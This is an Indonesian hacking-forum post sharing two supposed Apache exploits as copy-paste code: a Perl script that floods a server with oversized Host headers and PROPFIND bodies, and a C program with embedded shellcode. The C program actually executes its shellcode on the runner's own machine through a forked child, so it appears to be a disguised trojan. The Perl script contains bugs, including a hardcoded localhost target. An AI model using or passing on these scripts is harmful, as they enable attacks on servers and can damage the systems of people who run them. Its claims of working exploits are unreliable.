|
| Exploit Apache 2.0.37-2.2.11 | |
| | Pengirim | Message |
---|
digitalcat BC Security
Jumlah posting : 451 Points : 710 Reputation : 28 Join date : 31.10.11 Age : 42
| Subyek: Exploit Apache 2.0.37-2.2.11 Tue May 01, 2012 8:28 pm | |
| Exploit Apache 2.0.37 - 2.0.45 By Matthew Murphy[Perl] Gunakan ActivePerl 5.8.x Cukup masukan IP Address port username dan password yang diinginkan Code Copy paste save as->Apache2.0.pl : - Code:
-
#!/usr/bin/perl # # Apache 2.0.37 - 2.0.45 APR Exploit # Written By Matthew Murphy # $BASE64_CMD_STRING = "use_base64_encoder_here %s";
$BASE64_USE_STDIN = 0;
$BASE64_WRITE_NL = "";
use IO::Socket; print STDOUT "Apache 2.0.37 - 2.0.45 Exploit\r\n"; print STDOUT "By Matthew Murphy\r\n\r\n"; print STDOUT "Enter the hostname/IP address of the server: "; $line = <STDIN>; $host = mychomp($line); print STDOUT "Enter the port of the server \[80\]: "; $line = <STDIN>; $port = mychomp($line); print STDOUT "Use authentication credentials for the session \[Y/N\]? "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { print STDOUT "What username shall we use: "; $line = <STDIN>; $user = mychomp($line); print STDOUT "What password shall we use: "; $line = <STDIN>; $pass = mychomp($line); $auth = "$user:$pass"; if ($BASE64_USE_STDIN) { # l33t Perl piping trix; NOTE: This is definitely # Alpha code! :-) pipe(STDOUTREAD, STDOUTWRITE); pipe(STDINREAD, STDINWRITE); open(OLDSTDIN, "&STDIN"); open(OLDSTDOUT, ">&STDOUT"); open(STDIN, "&STDINREAD"); open(STDOUT, ">&STDOUTWRITE"); close(STDINREAD); close(STDOUTWRITE); system($BASE64_CMD_STRING); open(STDIN, "&OLDSTDIN"); open(STDOUT, "&>OLDSTDOUT"); close(OLDSTDIN); close(OLDSTDOUT); print STDINWRITE $auth; close(STDINWRITE); read(STDOUTREAD, $base64, 4096); # Edit for insane passwords close(STDOUTREAD); } else { open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|"); read(READOUTPUT, $base64, 4096); # See above close(READOUTPUT); } $base64 = join("", split(/ /, $base64)); } else { $base64 = undef; } $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1"); print STDOUT "Exploiting a proxy server \[Y/N\]? "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { print $f "GET / HTTP/1.1\x0d\x0a";
# Apache 2.0.37 - 2.0.45 tries to limit header inputs, but uses a hash table # that ultimately concatenates multiple headers of the same name # together with ", " between them, so: # # Host: a # Host: b # # Bypasses Apache's buffer size checks, but ends up as: # # Host: a,b # # When processed. Confirm this with a TRACE against your server: # # TRACE / HTTP/1.1 # Host: a # Host: b # # The "message/http" body you receive will contain: # # TRACE / HTTP/1.1 # Host: a,b # # So, for those of you who are confused by this code fragment, # this is what it ultimately achieves! for ($i = 0; $i < 10; $i++) { print $f "Host: ".("A"x2000)."\r\n"; } if (defined($base64)) { print $f "Proxy-Authorization: Basic ".$base64."\r\n"; } print $f "\r\n"; } else { print STDOUT "What resource should be probed: "; $line = <STDIN>; $res = mychomp($line); print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] "; $line = <STDIN>; $char = mychomp($line); if ($char == "Y" || $char == "y") { $xmlbody = "<?xml version=\"1.0\"?>\r\n"; $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n"; $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n"; $xmlbody.= "</D:propfind>";
# HTTP headers print $f "PROPFIND $res HTTP/1.1\r\n"; print $f "Host: $host:$port\r\n"; print $f "Depth: 1\r\n"; print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n"; print $f "Content-Length: ".length($body)."\r\n\r\n"; if (defined($base64)) { print $f "Authorization: Basic ".$base64."\r\n"; } print $f "$xmlbody\r\n\r\n"; } else { # This does *almost* the exact same thing as the mod_proxy # code, and could be considered wasteful, but a few extra # CPU cycles never killed anybody. :-( print $f "GET $res HTTP/1.1\r\n"; for ($i = 0; $i < 10; $i++) { print $f "Host: ".("A"x2000)."\r\n"; } if (defined($base64)) { print $f "Authorization: Basic ".$base64."\r\n"; } print $f "\r\n"; } } while (defined($ln = <$f>)) { print STDOUT $ln; } undef $f; exit;
sub mychomp { my $data; my $arg = shift; my $CRLF; if ($^O == "MSWin32") { $CRLF = 1; } else { $CRLF = 0; } $data = substr($arg, 0, length($arg) - $CRLF); return $data; }
-------------------------------------------------------------------------- Exploit Apache 2.2.0 - 2.2.11Compile: - Code:
-
gcc apache.c
atau
Compile: gcc apache.c -o apache
Pengunaan : - Code:
-
./a.out <hostname> <port>
atau
./apache <hostname> <port>
Setelah di compile, contoh : - Code:
-
./apache 127.0.0.1 80
lakukan koneksi dengan netcat di port "12345" Code Copy paste save as->apache.c : - Code:
-
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h>
void usage(char *argv[]) { printf("Usage: %s <hostname> <port>\n\n",argv[0]); exit(1); }
int main(int argc,char *argv[]) { char *shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50" "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50" "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50" "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50" "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50" "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53" "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80"; int (*sc)()=(int(*)())shellcode; char host[100]; int sd; struct sockaddr_in sin; struct sockaddr_in pin; struct hostent *hp; char *evilreq=malloc(4096); pid_t pid;
if (argc!=3) usage(argv); strcpy(host,argv[1]); if ((hp = gethostbyname(host)) == 0) { perror("gethostbyname"); exit(2); } memset(&pin, 0, sizeof(pin)); pin.sin_family = AF_INET; pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr; pin.sin_port = htons(atoi(argv[2]));
if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); }
if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) { perror("connect"); exit(3); } printf("Connected,...\n"); sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode); if (send(sd, evilreq, strlen(evilreq), 0) == -1) { perror("send"); exit(1); } printf("Waiting some seconds...\n"); pid=fork(); if (pid==0) {close(2);sc();exit(0);} else { sleep(2); if (sd) { printf("Now type nc %s 12345 \n",argv[1]); close(sd); } } }
| |
| | | | Exploit Apache 2.0.37-2.2.11 | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|